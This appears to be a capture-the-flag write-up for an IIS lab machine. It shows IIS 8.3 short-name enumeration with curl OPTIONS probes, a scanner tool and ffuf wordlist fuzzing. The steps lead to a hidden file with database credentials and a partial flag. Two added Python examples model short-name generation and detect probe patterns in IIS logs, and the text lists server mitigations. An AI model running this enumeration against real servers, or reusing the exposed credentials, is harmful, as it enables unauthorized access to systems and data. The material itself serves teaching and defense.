15-IIS Short Names

When a request is made to a file or folder with a long name, IIS may resolve it through a short 8.3 alias that is generated for compatibility reasons. The tilde character "~" marks the short name.

For example, a file with a long name like "mydocument.txt" might get the short name "MYDOCU~1.TXT", and it can be accessed with a URL like http://example.com/MYDOCU~1.TXT
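To see why the alias reveals only the first six characters of a name (which is what the rest of this writeup works around), here is a simplified model of the Windows 8.3 generator, written as an added example for this page rather than taken from any tool; the "~1" counter is assumed fixed, whereas real NTFS increments it on collisions and uses hashed forms for later ones.

```python
from typing import Optional

# Simplified model of the Windows 8.3 short-name generator (illustration written
# for this writeup, not the scanner's code). Assumption: the collision counter is
# fixed at 1; on a real volume it becomes ~2, ~3, ... depending on the directory.
_INVALID = set('"*+,/:;<=>?\\[]|')

def _clean(part: str) -> str:
    """Drop spaces and periods, replace invalid characters with '_', upper-case."""
    part = part.replace(" ", "").replace(".", "")
    return "".join("_" if (c in _INVALID or ord(c) > 127) else c for c in part).upper()

def needs_short_name(name: str) -> bool:
    """True when `name` is not already a valid 8.3 name, so an alias gets created."""
    if name.count(".") > 1 or " " in name:
        return True
    if any(c in _INVALID or ord(c) > 127 for c in name):
        return True
    base, _, ext = name.partition(".")
    return base == "" or len(base) > 8 or len(ext) > 3

def short_name(name: str, counter: int = 1) -> Optional[str]:
    """Return the 8.3 alias IIS would accept for `name`, or None if none is generated."""
    if not needs_short_name(name):
        return None
    base, dot, ext = name.rpartition(".")
    if not dot or base == "":        # no extension, or a leading-dot name like .htaccess
        base, ext = name, ""
    alias = f"{_clean(base)[:6]}~{counter}"
    ext = _clean(ext)[:3]
    return f"{alias}.{ext}" if ext else alias

def leaked_prefix(alias: str) -> str:
    """The only part of the long name an 8.3 alias reveals: at most six characters."""
    return alias.split("~", 1)[0].lower()

if __name__ == "__main__":
    for n in ("mydocument.txt", "poo_connection.txt", "templates", "web.config", "poo.txt"):
        print(f"{n:20} -> {short_name(n)}")
```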

A GET request does not give us anything, but an OPTIONS request does:

➜  poo curl -s -I -X OPTIONS 'http://10.13.38.11/ta*~1*/.aspx'
HTTP/1.1 200 OK
Allow: OPTIONS, TRACE, GET, HEAD, POST
Server: Microsoft-IIS/10.0
Public: OPTIONS, TRACE, GET, HEAD, POST
Date: Thu, 18 Jan 2024 04:25:43 GMT
Content-Length: 0

We'll use a tool that fuzzes for all possible short names:

https://github.com/lijiejie/IIS_shortname_Scanner

➜  poo python3 /opt/IIS_shortname_Scanner/iis_shortname_scan.py http://10.13.38.11
Server is vulnerable, please wait, scanning...
[+] /t~1.*      [scan in progress]
[+] /d~1.*      [scan in progress]
[+] /n~1.*      [scan in progress]
[+] /w~1.*      [scan in progress]
[+] /te~1.*     [scan in progress]
[+] /tr~1.*     [scan in progress]
[+] /ds~1.*     [scan in progress]
[+] /ne~1.*     [scan in progress]
[+] /we~1.*     [scan in progress]
[+] /tem~1.*    [scan in progress]
[+] /tra~1.*    [scan in progress]
[+] /ds_~1.*    [scan in progress]
[+] /new~1.*    [scan in progress]
[+] /web~1.*    [scan in progress]
[+] /temp~1.*   [scan in progress]
[+] /tras~1.*   [scan in progress]
[+] /ds_s~1.*   [scan in progress]
[+] /newf~1.*   [scan in progress]
[+] /templ~1.*  [scan in progress]
[+] /trash~1.*  [scan in progress]
[+] /ds_st~1.*  [scan in progress]
[+] /newfo~1.*  [scan in progress]
[+] /templa~1.* [scan in progress]
[+] /trashe~1.* [scan in progress]
[+] /ds_sto~1.* [scan in progress]
[+] /newfol~1.* [scan in progress]
[+] /templa~1   [scan in progress]
[+] Directory /templa~1 [Done]
[+] /trashe~1   [scan in progress]
[+] Directory /trashe~1 [Done]
[+] /ds_sto~1   [scan in progress]
[+] Directory /ds_sto~1 [Done]
[+] /newfol~1   [scan in progress]
[+] Directory /newfol~1 [Done]
----------------------------------------------------------------
Dir:  /templa~1
Dir:  /trashe~1
Dir:  /ds_sto~1
Dir:  /newfol~1
----------------------------------------------------------------
4 Directories, 0 Files found in total
Note that * is a wildcard, matches any character zero or more times.
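From the defender's side, the probing above leaves a distinctive trace in the IIS W3C logs: paths that contain a tilde-number and a "*" wildcard, which no legitimate long-name URL carries. The detector below is an added example for this page (not part of the writeup or the scanner); the log lines are constructed, and the field list and threshold are assumptions.

```python
import re
from collections import defaultdict
from typing import Dict, Iterator

# Constructed IIS W3C log excerpt for this example (not a log from the writeup's
# target). The probe paths copy the shape the scanner sends: prefix, "*", "~1",
# "*" and a suffix.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip cs(User-Agent) sc-status
2024-01-18 04:25:43 10.13.38.11 OPTIONS /ta*~1*/.aspx - 80 10.10.14.5 curl/8.4.0 200
2024-01-18 04:25:44 10.13.38.11 OPTIONS /tb*~1*/.aspx - 80 10.10.14.5 python-requests/2.31 404
2024-01-18 04:25:44 10.13.38.11 OPTIONS /te*~1*/.aspx - 80 10.10.14.5 python-requests/2.31 200
2024-01-18 04:25:45 10.13.38.11 OPTIONS /tem*~1*/.aspx - 80 10.10.14.5 python-requests/2.31 200
2024-01-18 04:25:46 10.13.38.11 GET /index.html - 80 10.10.14.9 Mozilla/5.0+(Windows) 200
2024-01-18 04:25:47 10.13.38.11 GET /dev/db/poo_co~1.txt - 80 10.10.14.5 python-requests/2.31 404
"""

TILDE_NUMBER = re.compile(r"~\d")  # the 8.3 alias marker, e.g. ~1

def parse_w3c(text: str) -> Iterator[Dict[str, str]]:
    """Yield one dict per request, keyed by the names in the latest #Fields line."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip() or fields is None:
            continue
        else:
            yield dict(zip(fields, line.split()))  # IIS writes spaces in values as "+"

def is_shortname_probe(stem: str) -> bool:
    """A tilde-number plus a wildcard in the path is the enumeration signature."""
    return bool(TILDE_NUMBER.search(stem)) and "*" in stem

def find_enumeration(text: str, threshold: int = 3) -> Dict[str, int]:
    """Map client IP -> number of 8.3 probes, for clients at or above `threshold`."""
    counts: Dict[str, int] = defaultdict(int)
    for rec in parse_w3c(text):
        if is_shortname_probe(rec.get("cs-uri-stem", "")):
            counts[rec.get("c-ip", "?")] += 1
    return {ip: n for ip, n in counts.items() if n >= threshold}

if __name__ == "__main__":
    for ip, n in find_enumeration(SAMPLE_LOG).items():
        print(f"{ip}: {n} short-name probes")
```

On the server, an IIS Request Filtering denyUrlSequences entry for "~" rejects these requests outright, and `fsutil 8dot3name set 1` stops NTFS from creating new short names (existing aliases persist until stripped with `fsutil 8dot3name strip`).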

I tried to fuzz different directories using the above tool; eventually I fuzzed the /dev directory:

➜  poo python3 /opt/IIS_shortname_Scanner/iis_shortname_scan.py http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db
Server is vulnerable, please wait, scanning...
[+] /dev/dca66d38fd916317687e1390a420c3fc/db/p~1.*      [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/db/po~1.*     [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/db/poo~1.*    [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/db/poo_~1.*   [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/db/poo_c~1.*  [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.* [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.t*        [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.tx*       [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.txt*      [scan in progress]
[+] File /dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.txt* [Done]
----------------------------------------------------------------
File: /dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.txt*
----------------------------------------------------------------
0 Directories, 1 Files found in total
Note that * is a wildcard, matches any character zero or more times.

We can find that .txt file by fuzzing. Since it starts with poo_co and ends with .txt, we can build a wordlist:

cat /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt | grep ^co > wordlist
➜  poo for i in $(cat wordlist ); do echo $i.txt;done > w
➜  poo mv w wordlist 
➜  poo ffuf -u http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ -w wordlist --mc all --fs 1245

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.0.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ
 :: Wordlist         : FUZZ: /home/nakul/Desktop/ctf/htb-EndGames/poo/wordlist
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: all
 :: Filter           : Response size: 1245
________________________________________________

[Status: 200, Size: 142, Words: 3, Lines: 7, Duration: 610ms]
    * FUZZ: connection.txt

:: Progress: [1340/1340] :: Job [1/1] :: 51 req/sec :: Duration: [0:00:22] :: Errors: 1 ::

Found the file: http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/poo_connection.txt

➜  poo wget http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/poo_connection.txt
--2024-01-18 10:18:45--  http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/poo_connection.txt
Connecting to 10.13.38.11:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 142 [text/plain]
Saving to: ‘poo_connection.txt’

poo_connection.txt            100%[===============================================>]     142  --.-KB/s    in 0s      

2024-01-18 10:18:47 (12.7 MB/s) - ‘poo_connection.txt’ saved [142/142]

➜  www cat poo_connection.txt 
SERVER=10.13.38.11
USERID=external_user
DBNAME=POO_PUBLIC
USERPWD=#p00Public3xt3rnalUs3r#

Flag : POO{fcfb0767--SNIP--